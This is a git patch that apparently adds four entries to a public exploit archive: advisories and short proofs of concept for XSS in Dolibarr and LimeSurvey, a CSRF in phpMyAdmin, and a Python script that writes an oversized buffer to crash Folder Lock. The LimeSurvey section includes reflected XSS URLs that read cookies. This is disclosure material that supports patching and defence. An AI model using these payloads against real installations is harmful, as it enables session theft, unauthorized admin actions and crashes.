From d15414605278981d1671ca53a5903eb4e40d28e6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 14 Sep 2019 05:02:28 +0000 Subject: [PATCH] DB: 2019-09-14 4 changes to exploits/shellcodes Folder Lock 7.7.9 - Denial of Service Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery LimeSurvey 3.17.13 - Cross-Site Scripting --- exploits/php/webapps/47384.txt | 20 +++++ exploits/php/webapps/47385.txt | 79 ++++++++++++++++++ exploits/php/webapps/47386.txt | 146 +++++++++++++++++++++++++++++++++ exploits/windows/dos/47383.py | 28 +++++++ files_exploits.csv | 4 + 5 files changed, 277 insertions(+) create mode 100644 exploits/php/webapps/47384.txt create mode 100644 exploits/php/webapps/47385.txt create mode 100644 exploits/php/webapps/47386.txt create mode 100755 exploits/windows/dos/47383.py diff --git a/exploits/php/webapps/47384.txt b/exploits/php/webapps/47384.txt new file mode 100644 index 000000000..809c4c654 --- /dev/null +++ b/exploits/php/webapps/47384.txt @@ -0,0 +1,20 @@ +# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross +Site Scripting +# Exploit Author: Metin Yunus Kandemir (kandemir) +# Vendor Homepage: https://www.dolibarr.org/ +# Software Link: https://www.dolibarr.org/downloads +# Version: 10.0.1 +# Category: Webapps +# Tested on: Xampp for Linux +# CVE: CVE-2019-16197 +# Software Description : Dolibarr ERP & CRM is a modern and easy to use +software package to manage your business... +================================================================== + +Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of +the User-Agent HTTP header is copied into the HTML document as plain text +between tags, leading to XSS. + +GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab \ No newline at end of file diff --git a/exploits/php/webapps/47385.txt b/exploits/php/webapps/47385.txt new file mode 100644 index 000000000..eb2a82d0e --- /dev/null +++ b/exploits/php/webapps/47385.txt @@ -0,0 +1,79 @@ +============================================= +MGC ALERT 2019-003 +- Original release date: June 13, 2019 +- Last revised: September 13, 2019 +- Discovered by: Manuel Garcia Cardenas +- Severity: 4,3/10 (CVSS Base Score) +- CVE-ID: CVE-2019-12922 +============================================= + +I. VULNERABILITY +------------------------- +phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery + +II. BACKGROUND +------------------------- +phpMyAdmin is a free software tool written in PHP, intended to handle the +administration of MySQL over the Web. phpMyAdmin supports a wide range of +operations on MySQL and MariaDB. + +III. DESCRIPTION +------------------------- +Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows +an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any +server in the Setup page. + +IV. PROOF OF CONCEPT +------------------------- +Exploit CSRF - Deleting main server + +

Deleting Server 1

+ + +V. BUSINESS IMPACT +------------------------- +The attacker can easily create a fake hyperlink containing the request that +wants to execute on behalf the user,in this way making possible a CSRF +attack due to the wrong use of HTTP method. + +VI. SYSTEMS AFFECTED +------------------------- +phpMyAdmin <= 4.9.0.1 + +VII. SOLUTION +------------------------- +Implement in each call the validation of the token variable, as already +done in other phpMyAdmin requests. + +VIII. REFERENCES +------------------------- +https://www.phpmyadmin.net/ + +IX. CREDITS +------------------------- +This vulnerability has been discovered and reported +by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). + +X. REVISION HISTORY +------------------------- +June 13, 2019 1: Initial release +September 13, 2019 2: Last revision + +XI. DISCLOSURE TIMELINE +------------------------- +June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas +June 13, 2019 2: Send to vendor +July 16, 2019 3: New request to vendor without fix date +September 13, 2019 4: Sent to lists + +XII. LEGAL NOTICES +------------------------- +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. + +XIII. ABOUT +------------------------- +Manuel Garcia Cardenas +Pentester \ No newline at end of file diff --git a/exploits/php/webapps/47386.txt b/exploits/php/webapps/47386.txt new file mode 100644 index 000000000..33e0fe015 --- /dev/null +++ b/exploits/php/webapps/47386.txt @@ -0,0 +1,146 @@ +SEC Consult Vulnerability Lab Security Advisory < 20190912-0 > +======================================================================= + title: Stored and reflected XSS vulnerabilities + product: LimeSurvey + vulnerable version: <= 3.17.13 + fixed version: =>3.17.14 + CVE number: CVE-2019-16172, CVE-2019-16173 + impact: medium + homepage: https://www.limesurvey.org/ + found: 2019-08-23 + by: Andreas Kolbeck (Office Munich) + David Haintz (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"LimeSurvey is the tool to use for your online surveys. Whether you are +conducting simple questionnaires with just a couple of questions or advanced +assessments with conditionals and quota management, LimeSurvey has got you +covered. LimeSurvey is 100% open source and will always be transparently developed. +We can help you reach your goals." + +Source: https://www.limesurvey.org/ + + +Business recommendation: +------------------------ +LimeSurvey suffered from a vulnerability due to improper input +and output validation. By exploiting this vulnerability an attacker could: + 1. Attack other users of the web application with JavaScript code, + browser exploits or Trojan horses, or + 2. perform unauthorized actions in the name of another logged-in user. + +The vendor provides a patch which should be installed immediately. +Furthermore, a thorough security analysis is highly recommended as only a +short spot check has been performed and additional issues are to be expected. + + +Vulnerability overview/description: +----------------------------------- +1) Stored and reflected XSS vulnerabilities +LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability, +which allows an attacker to execute JavaScript code with the permissions of the victim. +In this way it is possible to escalate privileges from a low-privileged account e.g. +to "SuperAdmin". + + +Proof of concept: +----------------- +1) Stored and reflected XSS vulnerabilities +Example 1 - Stored XSS (CVE-2019-16172): +The attacker needs the appropriate permissions in order to create new survey groups. +Then create a survey group with a JavaScript payload in the title, for example: + +test + +When the survey group is being deleted, e.g. by an administrative user, the JavaScript +code will be executed as part of the "success" message. + + +Example 2 - Reflected XSS (CVE-2019-16173): +The following proof of concept prints the current CSRF token cookie which contains the +CSRF token. The parameter "surveyid" is not filtered properly: + +http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20 +src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question + + +If the URL schema is configured differently the following payload works: +http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid= +xxx">&sa=listquestions&sort=question + + +Vulnerable / tested versions: +----------------------------- +The vulnerabilities have been verified to exist in version 3.17.9 and the latest +version 3.17.13. It is assumed that older versions are affected as well. + + +Vendor contact timeline: +------------------------ +2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204 +2019-09-02: Fixes available: + https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a + https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006 +2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues +2019-09-03: Release of LimeSurvey v3.17.15 bug fix +2019-09-12: Coordinated release of security advisory + + +Solution: +--------- +Update to version 3.17.15 or higher: +https://www.limesurvey.org/stable-release + +The vendor provides a detailed list of changes here: +https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released + + +Workaround: +----------- +No workaround available. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF A. Kolbeck / @2019 \ No newline at end of file diff --git a/exploits/windows/dos/47383.py b/exploits/windows/dos/47383.py new file mode 100755 index 000000000..ffe7225d9 --- /dev/null +++ b/exploits/windows/dos/47383.py @@ -0,0 +1,28 @@ +# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit +# Date: 12.09.2019 +# Vendor Homepage:https://www.newsoftwares.net/folderlock/ +# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe +# Exploit Author: Achilles +# Tested Version: 7.7.9 +# Tested on: Windows 7 x64 + + +# 1.- Run python code :Folder_Lock.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open Folderlock and Click 'Enter Key' +# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key' +# 5.- Click 'Submit' and you will see a crash. + + + +#!/usr/bin/env python +buffer = "\x41" * 6000 + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 23f895b4a..ccf4e31f6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6559,6 +6559,7 @@ id,file,description,date,author,type,platform,port 47328,exploits/windows/dos/47328.py,"VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service",2019-08-30,"James Chamberlain",dos,windows, 47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows, 47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows, +47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -41728,3 +41729,6 @@ id,file,description,date,author,type,platform,port 47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80 47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java, 47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware, +47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php, +47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80 +47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80